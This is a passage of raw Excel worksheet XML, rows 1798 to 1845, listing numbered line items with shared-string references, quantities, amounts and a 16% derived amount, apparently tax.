        <v>1832</v>
      </c>
      <c r="C1798" s="238" t="s">
        <v>9618</v>
      </c>
      <c r="D1798" s="238" t="s">
        <v>9619</v>
      </c>
      <c r="E1798" s="238" t="s">
        <v>9620</v>
      </c>
      <c r="F1798" s="238" t="s">
        <v>9621</v>
      </c>
      <c r="G1798" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1798" s="10">
        <v>2</v>
      </c>
      <c r="I1798" s="14">
        <v>817.08</v>
      </c>
      <c r="J1798" s="15">
        <v>130.7328</v>
      </c>
      <c r="K1798" s="16"/>
    </row>
    <row r="1799" spans="2:11">
      <c r="B1799" s="9">
        <v>1833</v>
      </c>
      <c r="C1799" s="238" t="s">
        <v>9622</v>
      </c>
      <c r="D1799" s="238" t="s">
        <v>9623</v>
      </c>
      <c r="E1799" s="238" t="s">
        <v>9624</v>
      </c>
      <c r="F1799" s="238" t="s">
        <v>9625</v>
      </c>
      <c r="G1799" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1799" s="10">
        <v>6</v>
      </c>
      <c r="I1799" s="14">
        <v>1500</v>
      </c>
      <c r="J1799" s="15">
        <v>240</v>
      </c>
      <c r="K1799" s="16"/>
    </row>
    <row r="1800" spans="2:11">
      <c r="B1800" s="9">
        <v>1834</v>
      </c>
      <c r="C1800" s="238" t="s">
        <v>9626</v>
      </c>
      <c r="D1800" s="238" t="s">
        <v>9627</v>
      </c>
      <c r="E1800" s="238" t="s">
        <v>9628</v>
      </c>
      <c r="F1800" s="238" t="s">
        <v>9629</v>
      </c>
      <c r="G1800" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1800" s="10">
        <v>12</v>
      </c>
      <c r="I1800" s="14">
        <v>3950.96</v>
      </c>
      <c r="J1800" s="15">
        <v>632.16</v>
      </c>
      <c r="K1800" s="16"/>
    </row>
    <row r="1801" spans="2:11">
      <c r="B1801" s="9">
        <v>1835</v>
      </c>
      <c r="C1801" s="238" t="s">
        <v>9630</v>
      </c>
      <c r="D1801" s="238" t="s">
        <v>9631</v>
      </c>
      <c r="E1801" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1801" s="238" t="s">
        <v>9632</v>
      </c>
      <c r="G1801" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1801" s="10">
        <v>20</v>
      </c>
      <c r="I1801" s="14">
        <v>1107.69</v>
      </c>
      <c r="J1801" s="15">
        <v>177.216</v>
      </c>
      <c r="K1801" s="16"/>
    </row>
    <row r="1802" spans="2:11">
      <c r="B1802" s="9">
        <v>1836</v>
      </c>
      <c r="C1802" s="238" t="s">
        <v>9633</v>
      </c>
      <c r="D1802" s="238" t="s">
        <v>9634</v>
      </c>
      <c r="E1802" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F1802" s="9"/>
      <c r="G1802" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1802" s="10">
        <v>1</v>
      </c>
      <c r="I1802" s="14">
        <v>1452.99</v>
      </c>
      <c r="J1802" s="15">
        <v>232.4784</v>
      </c>
      <c r="K1802" s="16"/>
    </row>
    <row r="1803" spans="2:11">
      <c r="B1803" s="9">
        <v>1837</v>
      </c>
      <c r="C1803" s="238" t="s">
        <v>9635</v>
      </c>
      <c r="D1803" s="238" t="s">
        <v>9636</v>
      </c>
      <c r="E1803" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F1803" s="238" t="s">
        <v>9637</v>
      </c>
      <c r="G1803" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1803" s="10">
        <v>109</v>
      </c>
      <c r="I1803" s="14">
        <v>3331.03</v>
      </c>
      <c r="J1803" s="15">
        <v>532.9664</v>
      </c>
      <c r="K1803" s="16"/>
    </row>
    <row r="1804" spans="2:11">
      <c r="B1804" s="9">
        <v>1838</v>
      </c>
      <c r="C1804" s="238" t="s">
        <v>9638</v>
      </c>
      <c r="D1804" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E1804" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1804" s="9"/>
      <c r="G1804" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1804" s="10">
        <v>10</v>
      </c>
      <c r="I1804" s="14">
        <v>15.38</v>
      </c>
      <c r="J1804" s="15">
        <v>2.464</v>
      </c>
      <c r="K1804" s="16"/>
    </row>
    <row r="1805" spans="2:11">
      <c r="B1805" s="9">
        <v>1839</v>
      </c>
      <c r="C1805" s="238" t="s">
        <v>9639</v>
      </c>
      <c r="D1805" s="238" t="s">
        <v>4908</v>
      </c>
      <c r="E1805" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F1805" s="9"/>
      <c r="G1805" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1805" s="10">
        <v>30</v>
      </c>
      <c r="I1805" s="14">
        <v>784.62</v>
      </c>
      <c r="J1805" s="15">
        <v>125.52</v>
      </c>
      <c r="K1805" s="16"/>
    </row>
    <row r="1806" spans="2:11">
      <c r="B1806" s="9">
        <v>1840</v>
      </c>
      <c r="C1806" s="238" t="s">
        <v>9640</v>
      </c>
      <c r="D1806" s="238" t="s">
        <v>9641</v>
      </c>
      <c r="E1806" s="238" t="s">
        <v>9642</v>
      </c>
      <c r="F1806" s="9"/>
      <c r="G1806" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1806" s="10">
        <v>10</v>
      </c>
      <c r="I1806" s="14">
        <v>2485.76</v>
      </c>
      <c r="J1806" s="15">
        <v>397.728</v>
      </c>
      <c r="K1806" s="16"/>
    </row>
    <row r="1807" spans="2:11">
      <c r="B1807" s="9">
        <v>1841</v>
      </c>
      <c r="C1807" s="238" t="s">
        <v>9643</v>
      </c>
      <c r="D1807" s="238" t="s">
        <v>9644</v>
      </c>
      <c r="E1807" s="238" t="s">
        <v>9645</v>
      </c>
      <c r="F1807" s="9"/>
      <c r="G1807" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1807" s="10">
        <v>4</v>
      </c>
      <c r="I1807" s="14">
        <v>208.86</v>
      </c>
      <c r="J1807" s="15">
        <v>33.4208</v>
      </c>
      <c r="K1807" s="16"/>
    </row>
    <row r="1808" spans="2:11">
      <c r="B1808" s="9">
        <v>1842</v>
      </c>
      <c r="C1808" s="238" t="s">
        <v>9646</v>
      </c>
      <c r="D1808" s="238" t="s">
        <v>9647</v>
      </c>
      <c r="E1808" s="238" t="s">
        <v>9648</v>
      </c>
      <c r="F1808" s="9"/>
      <c r="G1808" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1808" s="10">
        <v>9</v>
      </c>
      <c r="I1808" s="14">
        <v>380.12</v>
      </c>
      <c r="J1808" s="15">
        <v>60.8256</v>
      </c>
      <c r="K1808" s="16"/>
    </row>
    <row r="1809" spans="2:11">
      <c r="B1809" s="9">
        <v>1843</v>
      </c>
      <c r="C1809" s="238" t="s">
        <v>9649</v>
      </c>
      <c r="D1809" s="238" t="s">
        <v>9650</v>
      </c>
      <c r="E1809" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1809" s="238" t="s">
        <v>9651</v>
      </c>
      <c r="G1809" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1809" s="10">
        <v>40</v>
      </c>
      <c r="I1809" s="14">
        <v>120.39</v>
      </c>
      <c r="J1809" s="15">
        <v>19.264</v>
      </c>
      <c r="K1809" s="16"/>
    </row>
    <row r="1810" spans="2:11">
      <c r="B1810" s="9">
        <v>1844</v>
      </c>
      <c r="C1810" s="238" t="s">
        <v>9652</v>
      </c>
      <c r="D1810" s="238" t="s">
        <v>9653</v>
      </c>
      <c r="E1810" s="238" t="s">
        <v>9654</v>
      </c>
      <c r="F1810" s="9"/>
      <c r="G1810" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1810" s="10">
        <v>10</v>
      </c>
      <c r="I1810" s="14">
        <v>2016.46</v>
      </c>
      <c r="J1810" s="15">
        <v>322.64</v>
      </c>
      <c r="K1810" s="16"/>
    </row>
    <row r="1811" spans="2:11">
      <c r="B1811" s="9">
        <v>1845</v>
      </c>
      <c r="C1811" s="238" t="s">
        <v>9655</v>
      </c>
      <c r="D1811" s="238" t="s">
        <v>6733</v>
      </c>
      <c r="E1811" s="238" t="s">
        <v>6734</v>
      </c>
      <c r="F1811" s="9"/>
      <c r="G1811" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1811" s="10">
        <v>4</v>
      </c>
      <c r="I1811" s="14">
        <v>185.46</v>
      </c>
      <c r="J1811" s="15">
        <v>29.6768</v>
      </c>
      <c r="K1811" s="16"/>
    </row>
    <row r="1812" spans="2:11">
      <c r="B1812" s="9">
        <v>1846</v>
      </c>
      <c r="C1812" s="238" t="s">
        <v>9656</v>
      </c>
      <c r="D1812" s="238" t="s">
        <v>9420</v>
      </c>
      <c r="E1812" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F1812" s="9"/>
      <c r="G1812" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1812" s="10">
        <v>2</v>
      </c>
      <c r="I1812" s="14">
        <v>164.61</v>
      </c>
      <c r="J1812" s="15">
        <v>26.3392</v>
      </c>
      <c r="K1812" s="16"/>
    </row>
    <row r="1813" spans="2:11">
      <c r="B1813" s="9">
        <v>1847</v>
      </c>
      <c r="C1813" s="238" t="s">
        <v>9657</v>
      </c>
      <c r="D1813" s="238" t="s">
        <v>9658</v>
      </c>
      <c r="E1813" s="238" t="s">
        <v>9659</v>
      </c>
      <c r="F1813" s="238" t="s">
        <v>9660</v>
      </c>
      <c r="G1813" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1813" s="10">
        <v>17</v>
      </c>
      <c r="I1813" s="14">
        <v>120.57</v>
      </c>
      <c r="J1813" s="15">
        <v>19.2848</v>
      </c>
      <c r="K1813" s="16"/>
    </row>
    <row r="1814" spans="2:11">
      <c r="B1814" s="9">
        <v>1848</v>
      </c>
      <c r="C1814" s="238" t="s">
        <v>9661</v>
      </c>
      <c r="D1814" s="238" t="s">
        <v>9662</v>
      </c>
      <c r="E1814" s="238" t="s">
        <v>9659</v>
      </c>
      <c r="F1814" s="238" t="s">
        <v>9663</v>
      </c>
      <c r="G1814" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1814" s="10">
        <v>1</v>
      </c>
      <c r="I1814" s="14">
        <v>11.12</v>
      </c>
      <c r="J1814" s="15">
        <v>1.7792</v>
      </c>
      <c r="K1814" s="16"/>
    </row>
    <row r="1815" spans="2:11">
      <c r="B1815" s="9">
        <v>1849</v>
      </c>
      <c r="C1815" s="238" t="s">
        <v>9664</v>
      </c>
      <c r="D1815" s="238" t="s">
        <v>9665</v>
      </c>
      <c r="E1815" s="238" t="s">
        <v>9659</v>
      </c>
      <c r="F1815" s="238" t="s">
        <v>9666</v>
      </c>
      <c r="G1815" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1815" s="10">
        <v>8</v>
      </c>
      <c r="I1815" s="14">
        <v>656.41</v>
      </c>
      <c r="J1815" s="15">
        <v>105.024</v>
      </c>
      <c r="K1815" s="16"/>
    </row>
    <row r="1816" spans="2:11">
      <c r="B1816" s="9">
        <v>1850</v>
      </c>
      <c r="C1816" s="238" t="s">
        <v>9667</v>
      </c>
      <c r="D1816" s="238" t="s">
        <v>9668</v>
      </c>
      <c r="E1816" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1816" s="238" t="s">
        <v>6595</v>
      </c>
      <c r="G1816" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1816" s="10">
        <v>1</v>
      </c>
      <c r="I1816" s="14">
        <v>13.67</v>
      </c>
      <c r="J1816" s="15">
        <v>2.1872</v>
      </c>
      <c r="K1816" s="16"/>
    </row>
    <row r="1817" spans="2:11">
      <c r="B1817" s="9">
        <v>1851</v>
      </c>
      <c r="C1817" s="238" t="s">
        <v>9670</v>
      </c>
      <c r="D1817" s="238" t="s">
        <v>9671</v>
      </c>
      <c r="E1817" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1817" s="238" t="s">
        <v>9672</v>
      </c>
      <c r="G1817" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1817" s="10">
        <v>8</v>
      </c>
      <c r="I1817" s="14">
        <v>446.72</v>
      </c>
      <c r="J1817" s="15">
        <v>71.4752</v>
      </c>
      <c r="K1817" s="16"/>
    </row>
    <row r="1818" spans="2:11">
      <c r="B1818" s="9">
        <v>1852</v>
      </c>
      <c r="C1818" s="238" t="s">
        <v>9673</v>
      </c>
      <c r="D1818" s="238" t="s">
        <v>9674</v>
      </c>
      <c r="E1818" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1818" s="238" t="s">
        <v>9675</v>
      </c>
      <c r="G1818" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1818" s="10">
        <v>2</v>
      </c>
      <c r="I1818" s="14">
        <v>165.81</v>
      </c>
      <c r="J1818" s="15">
        <v>26.5312</v>
      </c>
      <c r="K1818" s="16"/>
    </row>
    <row r="1819" spans="2:11">
      <c r="B1819" s="9">
        <v>1853</v>
      </c>
      <c r="C1819" s="238" t="s">
        <v>9676</v>
      </c>
      <c r="D1819" s="238" t="s">
        <v>9677</v>
      </c>
      <c r="E1819" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1819" s="238" t="s">
        <v>9678</v>
      </c>
      <c r="G1819" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1819" s="10">
        <v>4</v>
      </c>
      <c r="I1819" s="14">
        <v>598.3</v>
      </c>
      <c r="J1819" s="15">
        <v>95.7312</v>
      </c>
      <c r="K1819" s="16"/>
    </row>
    <row r="1820" spans="2:11">
      <c r="B1820" s="9">
        <v>1854</v>
      </c>
      <c r="C1820" s="238" t="s">
        <v>9679</v>
      </c>
      <c r="D1820" s="238" t="s">
        <v>9680</v>
      </c>
      <c r="E1820" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1820" s="238" t="s">
        <v>9681</v>
      </c>
      <c r="G1820" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1820" s="10">
        <v>1</v>
      </c>
      <c r="I1820" s="14">
        <v>330.53</v>
      </c>
      <c r="J1820" s="15">
        <v>52.8848</v>
      </c>
      <c r="K1820" s="16"/>
    </row>
    <row r="1821" spans="2:11">
      <c r="B1821" s="9">
        <v>1855</v>
      </c>
      <c r="C1821" s="238" t="s">
        <v>9682</v>
      </c>
      <c r="D1821" s="238" t="s">
        <v>9683</v>
      </c>
      <c r="E1821" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1821" s="238" t="s">
        <v>9684</v>
      </c>
      <c r="G1821" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1821" s="10">
        <v>1</v>
      </c>
      <c r="I1821" s="14">
        <v>2435.9</v>
      </c>
      <c r="J1821" s="15">
        <v>389.744</v>
      </c>
      <c r="K1821" s="16"/>
    </row>
    <row r="1822" spans="2:11">
      <c r="B1822" s="9">
        <v>1856</v>
      </c>
      <c r="C1822" s="238" t="s">
        <v>9685</v>
      </c>
      <c r="D1822" s="238" t="s">
        <v>9683</v>
      </c>
      <c r="E1822" s="238" t="s">
        <v>9669</v>
      </c>
      <c r="F1822" s="238" t="s">
        <v>9686</v>
      </c>
      <c r="G1822" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1822" s="10">
        <v>2</v>
      </c>
      <c r="I1822" s="14">
        <v>1572.65</v>
      </c>
      <c r="J1822" s="15">
        <v>251.6256</v>
      </c>
      <c r="K1822" s="16"/>
    </row>
    <row r="1823" spans="2:11">
      <c r="B1823" s="9">
        <v>1857</v>
      </c>
      <c r="C1823" s="238" t="s">
        <v>9687</v>
      </c>
      <c r="D1823" s="238" t="s">
        <v>9688</v>
      </c>
      <c r="E1823" s="238" t="s">
        <v>9689</v>
      </c>
      <c r="F1823" s="238" t="s">
        <v>9690</v>
      </c>
      <c r="G1823" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1823" s="10">
        <v>19</v>
      </c>
      <c r="I1823" s="14">
        <v>432.92</v>
      </c>
      <c r="J1823" s="15">
        <v>69.2816</v>
      </c>
      <c r="K1823" s="16"/>
    </row>
    <row r="1824" spans="2:11">
      <c r="B1824" s="9">
        <v>1858</v>
      </c>
      <c r="C1824" s="238" t="s">
        <v>9691</v>
      </c>
      <c r="D1824" s="238" t="s">
        <v>9692</v>
      </c>
      <c r="E1824" s="238" t="s">
        <v>9693</v>
      </c>
      <c r="F1824" s="238" t="s">
        <v>9694</v>
      </c>
      <c r="G1824" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1824" s="10">
        <v>39</v>
      </c>
      <c r="I1824" s="14">
        <v>5688.03</v>
      </c>
      <c r="J1824" s="15">
        <v>910.104</v>
      </c>
      <c r="K1824" s="16"/>
    </row>
    <row r="1825" spans="2:11">
      <c r="B1825" s="9">
        <v>1859</v>
      </c>
      <c r="C1825" s="238" t="s">
        <v>9695</v>
      </c>
      <c r="D1825" s="238" t="s">
        <v>9696</v>
      </c>
      <c r="E1825" s="238" t="s">
        <v>9697</v>
      </c>
      <c r="F1825" s="238" t="s">
        <v>9698</v>
      </c>
      <c r="G1825" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H1825" s="10">
        <v>3</v>
      </c>
      <c r="I1825" s="14">
        <v>525.64</v>
      </c>
      <c r="J1825" s="15">
        <v>84.1008</v>
      </c>
      <c r="K1825" s="16"/>
    </row>
    <row r="1826" spans="2:11">
      <c r="B1826" s="9">
        <v>1860</v>
      </c>
      <c r="C1826" s="238" t="s">
        <v>9699</v>
      </c>
      <c r="D1826" s="238" t="s">
        <v>9700</v>
      </c>
      <c r="E1826" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1826" s="9"/>
      <c r="G1826" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1826" s="10">
        <v>451</v>
      </c>
      <c r="I1826" s="14">
        <v>8520.44</v>
      </c>
      <c r="J1826" s="15">
        <v>1363.1024</v>
      </c>
      <c r="K1826" s="16"/>
    </row>
    <row r="1827" spans="2:11">
      <c r="B1827" s="9">
        <v>1861</v>
      </c>
      <c r="C1827" s="238" t="s">
        <v>9702</v>
      </c>
      <c r="D1827" s="238" t="s">
        <v>9703</v>
      </c>
      <c r="E1827" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1827" s="238" t="s">
        <v>9704</v>
      </c>
      <c r="G1827" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1827" s="10">
        <v>2</v>
      </c>
      <c r="I1827" s="14">
        <v>343.4</v>
      </c>
      <c r="J1827" s="15">
        <v>54.944</v>
      </c>
      <c r="K1827" s="16"/>
    </row>
    <row r="1828" spans="2:11">
      <c r="B1828" s="9">
        <v>1862</v>
      </c>
      <c r="C1828" s="238" t="s">
        <v>9705</v>
      </c>
      <c r="D1828" s="238" t="s">
        <v>9706</v>
      </c>
      <c r="E1828" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1828" s="238" t="s">
        <v>9707</v>
      </c>
      <c r="G1828" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1828" s="10">
        <v>60</v>
      </c>
      <c r="I1828" s="14">
        <v>154.91</v>
      </c>
      <c r="J1828" s="15">
        <v>24.768</v>
      </c>
      <c r="K1828" s="16"/>
    </row>
    <row r="1829" spans="2:11">
      <c r="B1829" s="9">
        <v>1863</v>
      </c>
      <c r="C1829" s="238" t="s">
        <v>9708</v>
      </c>
      <c r="D1829" s="238" t="s">
        <v>9709</v>
      </c>
      <c r="E1829" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1829" s="238" t="s">
        <v>9710</v>
      </c>
      <c r="G1829" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1829" s="10">
        <v>78</v>
      </c>
      <c r="I1829" s="14">
        <v>1811.58</v>
      </c>
      <c r="J1829" s="15">
        <v>289.9104</v>
      </c>
      <c r="K1829" s="16"/>
    </row>
    <row r="1830" spans="2:11">
      <c r="B1830" s="9">
        <v>1864</v>
      </c>
      <c r="C1830" s="238" t="s">
        <v>9711</v>
      </c>
      <c r="D1830" s="238" t="s">
        <v>9712</v>
      </c>
      <c r="E1830" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1830" s="238" t="s">
        <v>9713</v>
      </c>
      <c r="G1830" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1830" s="10">
        <v>170</v>
      </c>
      <c r="I1830" s="14">
        <v>3487.29</v>
      </c>
      <c r="J1830" s="15">
        <v>557.872</v>
      </c>
      <c r="K1830" s="16"/>
    </row>
    <row r="1831" spans="2:11">
      <c r="B1831" s="9">
        <v>1865</v>
      </c>
      <c r="C1831" s="238" t="s">
        <v>9714</v>
      </c>
      <c r="D1831" s="238" t="s">
        <v>9715</v>
      </c>
      <c r="E1831" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1831" s="238" t="s">
        <v>9716</v>
      </c>
      <c r="G1831" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1831" s="10">
        <v>56</v>
      </c>
      <c r="I1831" s="14">
        <v>1641.25</v>
      </c>
      <c r="J1831" s="15">
        <v>262.6176</v>
      </c>
      <c r="K1831" s="16"/>
    </row>
    <row r="1832" spans="2:11">
      <c r="B1832" s="9">
        <v>1866</v>
      </c>
      <c r="C1832" s="238" t="s">
        <v>9717</v>
      </c>
      <c r="D1832" s="238" t="s">
        <v>9718</v>
      </c>
      <c r="E1832" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1832" s="238" t="s">
        <v>9719</v>
      </c>
      <c r="G1832" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1832" s="10">
        <v>5</v>
      </c>
      <c r="I1832" s="14">
        <v>363.24</v>
      </c>
      <c r="J1832" s="15">
        <v>58.12</v>
      </c>
      <c r="K1832" s="16"/>
    </row>
    <row r="1833" spans="2:11">
      <c r="B1833" s="9">
        <v>1867</v>
      </c>
      <c r="C1833" s="238" t="s">
        <v>9720</v>
      </c>
      <c r="D1833" s="238" t="s">
        <v>9721</v>
      </c>
      <c r="E1833" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1833" s="238" t="s">
        <v>9722</v>
      </c>
      <c r="G1833" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1833" s="10">
        <v>110</v>
      </c>
      <c r="I1833" s="14">
        <v>591.23</v>
      </c>
      <c r="J1833" s="15">
        <v>94.512</v>
      </c>
      <c r="K1833" s="16"/>
    </row>
    <row r="1834" spans="2:11">
      <c r="B1834" s="9">
        <v>1868</v>
      </c>
      <c r="C1834" s="238" t="s">
        <v>9723</v>
      </c>
      <c r="D1834" s="238" t="s">
        <v>9724</v>
      </c>
      <c r="E1834" s="238" t="s">
        <v>9725</v>
      </c>
      <c r="F1834" s="238" t="s">
        <v>9707</v>
      </c>
      <c r="G1834" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1834" s="10">
        <v>24</v>
      </c>
      <c r="I1834" s="14">
        <v>61.56</v>
      </c>
      <c r="J1834" s="15">
        <v>9.8688</v>
      </c>
      <c r="K1834" s="16"/>
    </row>
    <row r="1835" spans="2:11">
      <c r="B1835" s="9">
        <v>1869</v>
      </c>
      <c r="C1835" s="238" t="s">
        <v>9726</v>
      </c>
      <c r="D1835" s="238" t="s">
        <v>9700</v>
      </c>
      <c r="E1835" s="238" t="s">
        <v>9701</v>
      </c>
      <c r="F1835" s="238" t="s">
        <v>9727</v>
      </c>
      <c r="G1835" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1835" s="10">
        <v>14</v>
      </c>
      <c r="I1835" s="14">
        <v>308.23</v>
      </c>
      <c r="J1835" s="15">
        <v>49.3248</v>
      </c>
      <c r="K1835" s="16"/>
    </row>
    <row r="1836" spans="2:11">
      <c r="B1836" s="9">
        <v>1870</v>
      </c>
      <c r="C1836" s="238" t="s">
        <v>9728</v>
      </c>
      <c r="D1836" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E1836" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F1836" s="9"/>
      <c r="G1836" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1836" s="10">
        <v>334</v>
      </c>
      <c r="I1836" s="14">
        <v>5417.22</v>
      </c>
      <c r="J1836" s="15">
        <v>866.7968</v>
      </c>
      <c r="K1836" s="16"/>
    </row>
    <row r="1837" spans="2:11">
      <c r="B1837" s="9">
        <v>1871</v>
      </c>
      <c r="C1837" s="238" t="s">
        <v>9729</v>
      </c>
      <c r="D1837" s="238" t="s">
        <v>9730</v>
      </c>
      <c r="E1837" s="238" t="s">
        <v>9731</v>
      </c>
      <c r="F1837" s="238" t="s">
        <v>9732</v>
      </c>
      <c r="G1837" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1837" s="10">
        <v>80</v>
      </c>
      <c r="I1837" s="14">
        <v>1162.4</v>
      </c>
      <c r="J1837" s="15">
        <v>185.984</v>
      </c>
      <c r="K1837" s="16"/>
    </row>
    <row r="1838" spans="2:11">
      <c r="B1838" s="9">
        <v>1872</v>
      </c>
      <c r="C1838" s="238" t="s">
        <v>9733</v>
      </c>
      <c r="D1838" s="238" t="s">
        <v>9734</v>
      </c>
      <c r="E1838" s="238" t="s">
        <v>9731</v>
      </c>
      <c r="F1838" s="238" t="s">
        <v>9735</v>
      </c>
      <c r="G1838" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1838" s="10">
        <v>80</v>
      </c>
      <c r="I1838" s="14">
        <v>820.51</v>
      </c>
      <c r="J1838" s="15">
        <v>131.328</v>
      </c>
      <c r="K1838" s="16"/>
    </row>
    <row r="1839" spans="2:11">
      <c r="B1839" s="9">
        <v>1873</v>
      </c>
      <c r="C1839" s="238" t="s">
        <v>9736</v>
      </c>
      <c r="D1839" s="238" t="s">
        <v>9737</v>
      </c>
      <c r="E1839" s="238" t="s">
        <v>9738</v>
      </c>
      <c r="F1839" s="238" t="s">
        <v>9739</v>
      </c>
      <c r="G1839" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1839" s="10">
        <v>11</v>
      </c>
      <c r="I1839" s="14">
        <v>254.7</v>
      </c>
      <c r="J1839" s="15">
        <v>40.744</v>
      </c>
      <c r="K1839" s="16"/>
    </row>
    <row r="1840" spans="2:11">
      <c r="B1840" s="9">
        <v>1874</v>
      </c>
      <c r="C1840" s="238" t="s">
        <v>9740</v>
      </c>
      <c r="D1840" s="238" t="s">
        <v>9741</v>
      </c>
      <c r="E1840" s="238" t="s">
        <v>9738</v>
      </c>
      <c r="F1840" s="238" t="s">
        <v>9742</v>
      </c>
      <c r="G1840" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1840" s="10">
        <v>40</v>
      </c>
      <c r="I1840" s="14">
        <v>691.76</v>
      </c>
      <c r="J1840" s="15">
        <v>110.656</v>
      </c>
      <c r="K1840" s="16"/>
    </row>
    <row r="1841" spans="2:11">
      <c r="B1841" s="9">
        <v>1875</v>
      </c>
      <c r="C1841" s="238" t="s">
        <v>9743</v>
      </c>
      <c r="D1841" s="238" t="s">
        <v>9744</v>
      </c>
      <c r="E1841" s="238" t="s">
        <v>9745</v>
      </c>
      <c r="F1841" s="238" t="s">
        <v>9746</v>
      </c>
      <c r="G1841" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1841" s="10">
        <v>48</v>
      </c>
      <c r="I1841" s="14">
        <v>451.02</v>
      </c>
      <c r="J1841" s="15">
        <v>72.192</v>
      </c>
      <c r="K1841" s="16"/>
    </row>
    <row r="1842" spans="2:11">
      <c r="B1842" s="9">
        <v>1876</v>
      </c>
      <c r="C1842" s="238" t="s">
        <v>9747</v>
      </c>
      <c r="D1842" s="238" t="s">
        <v>9748</v>
      </c>
      <c r="E1842" s="238" t="s">
        <v>9745</v>
      </c>
      <c r="F1842" s="238" t="s">
        <v>9749</v>
      </c>
      <c r="G1842" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1842" s="10">
        <v>280</v>
      </c>
      <c r="I1842" s="14">
        <v>1898.35</v>
      </c>
      <c r="J1842" s="15">
        <v>303.744</v>
      </c>
      <c r="K1842" s="16"/>
    </row>
    <row r="1843" spans="2:11">
      <c r="B1843" s="9">
        <v>1877</v>
      </c>
      <c r="C1843" s="238" t="s">
        <v>9750</v>
      </c>
      <c r="D1843" s="238" t="s">
        <v>9751</v>
      </c>
      <c r="E1843" s="238" t="s">
        <v>9752</v>
      </c>
      <c r="F1843" s="238" t="s">
        <v>9753</v>
      </c>
      <c r="G1843" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1843" s="10">
        <v>20</v>
      </c>
      <c r="I1843" s="14">
        <v>61.54</v>
      </c>
      <c r="J1843" s="15">
        <v>9.856</v>
      </c>
      <c r="K1843" s="16"/>
    </row>
    <row r="1844" spans="2:11">
      <c r="B1844" s="9">
        <v>1878</v>
      </c>
      <c r="C1844" s="238" t="s">
        <v>9754</v>
      </c>
      <c r="D1844" s="238" t="s">
        <v>9751</v>
      </c>
      <c r="E1844" s="238" t="s">
        <v>9752</v>
      </c>
      <c r="F1844" s="238" t="s">
        <v>9755</v>
      </c>
      <c r="G1844" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1844" s="10">
        <v>48</v>
      </c>
      <c r="I1844" s="14">
        <v>96.41</v>
      </c>
      <c r="J1844" s="15">
        <v>15.4368</v>
      </c>
      <c r="K1844" s="16"/>
    </row>
    <row r="1845" spans="2:11">
      <c r="B1845" s="9">
        <v>1879</v>
      </c>
      <c r="C1845" s="238" t="s">
        <v>9756</v>
      </c>
      <c r="D1845" s="238" t="s">
        <v>9757</v>
      </c>
      <c r="E1845" s="238" t="s">
        <v>9758</v>
      </c>
      <c r="F1845" s="238" t="s">
        <v>9759</v>
      </c>
      <c r="G1845" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1845" s="10">
